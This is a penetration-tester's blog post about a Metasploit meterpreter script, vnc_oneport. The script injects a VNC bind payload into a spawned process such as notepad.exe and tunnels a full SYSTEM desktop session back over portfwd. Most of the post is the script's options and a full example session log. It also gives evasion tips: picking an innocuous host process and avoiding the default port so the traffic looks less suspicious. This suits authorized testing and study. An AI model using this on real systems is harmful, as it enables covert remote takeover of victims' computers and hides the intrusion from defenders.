Room362.com

Blatherings of a security addict.

Meterpreter Tunneling and VNC Revamped

| Comments

So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:

Looking at the script I noticed that it created a new connection (two connections outbound). Well it was the perfect excuse to take the newly refurbished portfwd command for a spin.

https://github.com/mubix/stuff/blob/master/metasploit/vnc_oneport.rb

Or you can get it via the SVN at Revision 7872

By creating a bind payload instead of a reverse connect we can have the payload listen locally. Then with portfwd command (just like on your home router) we forward a local port to the local host on the remote side, to the binded port. Connecting to the freshly bound port as if we were actually doing everything on the box itself. Creating a new session and a nice beautiful VNC window.

Options:

1
2
3
4
5
6
7
8
9

meterpreter > run vnc_oneport -h

OPTIONS:  
-e <opt> The process to run and inject into (default: notepad.exe)  
-h  This help menu  
-l <opt> The local port to listen on via port forwarding (default: 5901)  
-p <opt> The port on the remote host to bind VNC to (default: randomized)

meterpreter >

Example Run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)

meterpreter > **_run vnc_oneport_**
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207
[*] Host process notepad.exe has PID 532
[*] Allocated memory at address 0x00640000
[*] Writing the VNC stager into memory...
[*] Running Payload
[*] Creating a new thread within notepad.exe to run the VNC stager...
[*] Starting the port forwarding from 5901 => TARGET:1207
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207

meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)
Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called
[*] VNC Server session 2 closed.
meterpreter >
[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)  
meterpreter > run vnc_oneport  
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207  
[*] Host process notepad.exe has PID 532  
[*] Allocated memory at address 0x00640000  
[*] Writing the VNC stager into memory...  
[*] Running Payload  
[*] Creating a new thread within notepad.exe to run the VNC stager...  
[*] Starting the port forwarding from 5901 => TARGET:1207  
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207  
meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)  
Connected to RFB server, using protocol version 3.3  
No authentication needed  
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0  
Using default colormap which is TrueColor.  Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0  
Using shared memory PutImageSame machine: preferring raw encodingShmCleanup called  
[*] VNC Server session 2 closed.

meterpreter >

Note:

The forwarded port does not close even if the meterpreter session is ended, so use the following command to close the forward:

“` meterpreter > portfwd delete -l 5901
[*] Successfully stopped TCP relay on 0.0.0.0:5901 meterpreter >

(Note to BT4 users: do a apt-get install vncviewer before using any of the vnc payloads in Metasploit)

The script utilizes just one of the millions of way you can leverage ‘portfwd’ in your endeavors. But where it gets interesting is the fact that the delivery method for the payload never touches disk. That magic is all credited to HD though. What happens is a new process is created (notepad by default) and the newly created VNC bind payload is injected into it. But, the beauty is that it’s doing local connections via the port forwarding so all you see in TCPView is:

Now it’s definitely suspicious that Notepad has any connections at all, but you can use the option -e to provide any executable you wish, as long as it’s in the path for the system. For examples, look at what’s running naturally already.

Plus, you would probably not be using port 4444 for a meterpreter session. But what I wanted to demonstrate with this script is the power of both meterpreter, and port forwarding.

Now it’s your turn to make it better. Take a look at the guts, see if anything will help you in your scripting.

Comments